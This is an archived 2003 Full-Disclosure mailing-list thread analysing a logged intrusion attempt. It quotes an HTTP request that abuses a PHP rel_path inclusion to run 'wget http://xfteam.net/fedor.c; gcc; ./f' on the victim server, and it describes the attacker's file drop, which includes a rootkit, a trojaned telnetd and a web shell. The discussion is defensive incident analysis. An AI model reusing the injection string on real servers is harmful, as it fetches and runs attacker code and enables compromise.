Re: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??

[gml <gml@phrick.net>]

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1">
  <title></title>
</head>
<body>
I've attached a copy of the archive,&nbsp; I was able to retrieve it
apparently.<br>
It's sd's client code for his tty shell, looks like you've stumbled on
to someones private warez<br>
repository.&nbsp; The root of xfteam.net is just full of fun stuff<br>
<br>
<pre><a href="http://xfteam.net/";>Parent Directory</a>        20-Nov-2003 16:14 
     -  
<img alt="[   ]" src="cid:part1.04020804.02020907@phrick.net";> <a
 href="http://xfteam.net/c4";>c4</a>                      15-Nov-2003 10:49    
19k  
<img alt="[DIR]" src="cid:part2.03090705.07090706@phrick.net";> <a
 href="http://xfteam.net/cgi-bin/";>cgi-bin/</a>                20-Nov-2003 
16:13      -  
<img alt="[   ]" src="cid:part1.04020804.02020907@phrick.net";> <a
 href="http://xfteam.net/cmd.jpg.php";>cmd.jpg.php</a>             15-Nov-2003 
10:49     1k  
<img alt="[TXT]" src="cid:part4.07030709.00060700@phrick.net";> <a
 href="http://xfteam.net/cmd.txt";>cmd.txt</a>                 15-Nov-2003 10:47 
    1k  
<img alt="[   ]" src="cid:part1.04020804.02020907@phrick.net";> <a
 href="http://xfteam.net/f";>f</a>                       20-Nov-2003 13:01    
28k  
<img alt="[   ]" src="cid:part6.06040806.02000203@phrick.net";> <a
 href="http://xfteam.net/fedor.c";>fedor.c</a>                 15-Nov-2003 10:47 
    5k  
<img alt="[DIR]" src="cid:part2.03090705.07090706@phrick.net";> <a
 href="http://xfteam.net/forum/";>forum/</a>                  04-Nov-2003 22:05  
    -  
<img alt="[IMG]" src="cid:part8.01060601.03080303@phrick.net";> <a
 href="http://xfteam.net/google.jpg";>google.jpg</a>              19-Nov-2003 
19:56   106k  
<img alt="[IMG]" src="cid:part8.01060601.03080303@phrick.net";> <a
 href="http://xfteam.net/hax.gif";>hax.gif</a>                 19-Nov-2003 23:38 
    1k  
<img alt="[   ]" src="cid:part6.06040806.02000203@phrick.net";> <a
 href="http://xfteam.net/iomash.c";>iomash.c</a>                16-Nov-2003 
16:30     2k  
<img alt="[   ]" src="cid:part1.04020804.02020907@phrick.net";> <a
 href="http://xfteam.net/kmod";>kmod</a>                    15-Nov-2003 10:47    
17k  
<img alt="[DIR]" src="cid:part2.03090705.07090706@phrick.net";> <a
 href="http://xfteam.net/mail/";>mail/</a>                   20-Nov-2003 16:13   
   -  
<img alt="[   ]" src="cid:part13.07000004.08040907@phrick.net";> <a
 href="http://xfteam.net/putty.exe";>putty.exe</a>               19-Nov-2003 
12:36   220k  
<img alt="[   ]" src="cid:part1.04020804.02020907@phrick.net";> <a
 href="http://xfteam.net/remote.php";>remote.php</a>              15-Nov-2003 
10:49    87k  
<img alt="[TXT]" src="cid:part4.07030709.00060700@phrick.net";> <a
 href="http://xfteam.net/strings.txt";>strings.txt</a>             15-Nov-2003 
10:44     3k  
<img alt="[   ]" src="cid:part1.04020804.02020907@phrick.net";> <a
 href="http://xfteam.net/telnetd";>telnetd</a>                 16-Nov-2003 16:29 
  167k  

I'm of the opinion this is someones drop box, they drop off code they are going 
to later download and compile on a target machine from here.
The file c4 is a suckit variant, also by SD very popular with the linux kids.  
kmod is ptrace-kmod.c in ELF.  telnetd is what you would expect
it's a trojaned telnetd binary.  these binaries also appear to be infected with 
an RST variant: 
<a class="moz-txt-link-freetext" 
href="http://dump.cryptobeacon.net/papers/RST-Variant%20Analysis.txt";>http://dump.cryptobeacon.net/papers/RST-Variant%20Analysis.txt</a>,
 i wonder if your attacker knows this or not.  if not i feel really bad
for anyone he's attacked.  who says unix virii aren't effective?

yawn.

</pre>
<pre cols="72" class="moz-signature">char 
sig[]="\x31\xdb\x31\xc0\x31\xd2\xb2\x08\x68\x67\x6d\x6c\x0a\x89\xe1\xb0\x04\xcd\x80\xb0\x01\xcd\x80";
</pre>
<br>
<br>
Dan wrote:<br>
<blockquote type="cite" cite="midhounna.m4fx1i@vmail.lockedbox.net">
  <pre wrap="">Hi,
Our Snort picked up an interesting attempt to download, compile and execute.
Noting also the fact that the sub dir its attempting to access has not been
there for over 4 months(/logjam/)?

Has anyone actually seen what this fedor.c is? I have done some google'ing but
it comes up blank.

Has anyone else noticed this kindof request recently?

Is it just me or is xfteam.net not resolving anyway?

Orignal HTTP request:
GET /logjam/showhits.php?
rel_path=<a class="moz-txt-link-freetext" 
href="http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f";>http://xfteam.net/cmd.txt?&amp;cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&amp;cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f</a>

Breaking this down we get(twice):
uname -a
cd /tmp
wget <a class="moz-txt-link-freetext" 
href="http://xfteam.net/fedor.c";>http://xfteam.net/fedor.c</a>
gcc -o f fedor.c
./f


Regards,
Daniel.



_______________________________________________
Full-Disclosure - We believe in it.
Charter: <a class="moz-txt-link-freetext" 
href="http://lists.netsys.com/full-disclosure-charter.html";>http://lists.netsys.com/full-disclosure-charter.html</a>
  </pre>
</blockquote>
</body>
</html>

Attachment: xfteam.net.tar.gz
Description: application/gzip